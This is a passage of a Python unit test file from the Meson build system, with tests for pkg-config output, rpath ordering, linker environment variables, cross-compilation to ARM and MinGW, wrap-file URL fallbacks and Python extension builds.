self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '75 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
